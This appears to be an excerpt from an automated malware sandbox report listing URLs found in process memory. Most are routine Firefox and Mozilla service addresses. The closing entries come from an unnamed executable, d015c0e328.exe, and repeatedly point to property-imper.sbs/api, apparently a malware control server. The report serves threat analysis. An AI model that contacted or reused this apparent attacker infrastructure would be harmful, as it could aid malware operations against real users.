Source: firefox.exe, 00000019.00000002.2831590852.00000209A3EB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3030128647.00000209AFD40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2729096941.00000209A9185000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2731455941.00000209A930D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000019.00000002.2826386479.00000209A3D12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2858552666.00000209A5920000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Parent
Source: firefox.exe, 00000019.00000002.2835923520.00000209A4A2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2796475486.0000020997E6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3EB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3030128647.00000209AFD40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabhttps://getpocket.com/explore
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000019.00000003.2724088412.00000209AB7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabresource://activity-stream/lib/HighlightsFeed.j
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreCould
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-recommended-by-learn-more
Source: firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000019.00000003.2724088412.00000209AB7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000019.00000003.2724088412.00000209AB7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsdiscoverystream.isCollectionDismissiblediscoverystream.region-b
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000019.00000002.2849265731.00000209A4D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2712404213.00000209AFF73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000019.00000003.2719231877.00000209AFF65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2745476179.00000209AFF66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3039263764.00000209AFF67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000019.00000003.2719231877.00000209AFF65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2745476179.00000209AFF66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3039263764.00000209AFF67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000019.00000003.2629667399.00000209A7D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2629038791.00000209A7D20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2870035026.00000209A5F00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2629472889.00000209A7D5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2629282682.00000209A7D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2628849012.00000209A7B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsexperiments/screenshots/schema.jsonasyncEmitManifestE
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3032731152.00000209AFE7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3032731152.00000209AFE7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFE7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/login
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881.browser
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.3040511865.00000209B0003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000019.00000003.2724088412.00000209AB7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitConfiguration
Source: firefox.exe, 00000019.00000003.2724088412.00000209AB7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000019.00000002.2876719216.00000209A77B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 00000019.00000002.2876719216.00000209A77B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 00000019.00000002.2876719216.00000209A77B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 00000019.00000002.2876719216.00000209A77B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000019.00000002.3039369779.00000209AFF6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2744622132.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2718772825.00000209AFF6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000019.00000002.2894451888.00000209A85FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000019.00000002.2908707750.00000209A8606000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000019.00000002.3014477171.00000209AB761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.comresource://activity-stream/common/Actions.sys.mjsresource:///modules/PartnerLi
Source: firefox.exe, 00000019.00000002.3014477171.00000209AB761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3014477171.00000209AB703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000019.00000002.2851603582.00000209A5234000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2835923520.00000209A4AD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2631622886.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633755546.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2849265731.00000209A4D21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633258763.00000209A521E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sisDefault
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource://gre/modules/handlers/HandlerList.sys.mj
Source: firefox.exe, 00000019.00000002.2851603582.00000209A5234000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2631622886.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633755546.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633258763.00000209A521E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sextension/default-theme
Source: firefox.exe, 00000019.00000002.2851603582.00000209A5234000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2631622886.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633755546.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633258763.00000209A521E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%snewChannel
Source: firefox.exe, 00000019.00000002.2796475486.0000020997ED7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://gre/modules/TelemetryEnvironment.sys.mj
Source: firefox.exe, 00000019.00000002.2796475486.0000020997E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2859374693.00000209A5BE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000019.00000002.2851603582.00000209A5234000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2631622886.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633755546.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633258763.00000209A521E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000019.00000002.2851603582.00000209A5234000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2631622886.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633755546.00000209A5233000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2633258763.00000209A521E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000019.00000002.2859374693.00000209A5B77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: d015c0e328.exe, 0000000A.00000003.2836656383.000000000164D000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2840231634.000000000160A000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2957610878.0000000000542000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2716099922.000000000054A000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2955205423.0000000000568000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/
Source: d015c0e328.exe, 00000016.00000003.2716869243.000000000054C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/00
Source: d015c0e328.exe, 0000000A.00000003.2746676233.000000000160A000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2840231634.000000000160A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/8P
Source: d015c0e328.exe, 0000000A.00000003.2746676233.000000000160A000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2840231634.000000000160A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/D
Source: d015c0e328.exe, 0000000A.00000003.2746676233.000000000160A000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2840231634.000000000160A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/L0J
Source: d015c0e328.exe, 00000016.00000003.2778454117.0000000000546000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2846679937.000000000054D000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2747587637.0000000000560000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2751030367.000000000054D000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2683265747.000000000054B000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2754496805.000000000054D000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2959293839.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2955205423.0000000000568000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2719643130.0000000000548000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api
Source: d015c0e328.exe, 00000016.00000003.2747176932.0000000000549000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2747587637.0000000000560000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api%
Source: d015c0e328.exe, 00000007.00000003.2797016567.000000000119E000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2587943493.00000000011A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api(
Source: d015c0e328.exe, 00000016.00000003.2779399309.0000000000560000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2779060726.000000000054A000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2779637846.0000000000561000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2778454117.0000000000546000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api3
Source: d015c0e328.exe, 00000016.00000003.2857900972.0000000000560000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2874062925.0000000000560000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2955205423.0000000000568000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiN
Source: d015c0e328.exe, 00000007.00000003.2797016567.000000000119E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiO
